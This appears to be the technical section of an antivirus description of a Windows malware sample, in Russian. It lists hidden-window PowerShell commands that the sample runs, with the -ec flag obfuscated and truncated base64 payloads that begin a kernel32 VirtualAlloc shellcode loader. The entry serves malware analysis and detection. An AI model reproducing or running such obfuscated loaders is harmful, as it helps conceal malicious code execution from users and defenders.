Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v UyS -;s''v xf e''c;s''v kx ((g''v UyS).value.toString()+(g''v xf).value.toString());powershell (g''v kx).value.toString() ('JABhAGcAUAAgAD0AIAAnACQAYwBSACAAPQAgACcAJwBbAEQAbABsAEk...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JABhAGcAUAAgAD0AIAAnACQAYwBSACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e''c JABjAFIAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v UyS -;s''v xf e''c;s''v kx ((g''v UyS).value.toString()+(g''v xf).value.toString());powershell (g''v kx).value.toString() ('JABhAGcAUAAgAD0AIAAnACQAYwBSACAAPQAgACcAJwBbAEQAbABsAEk... (со скрытым окном)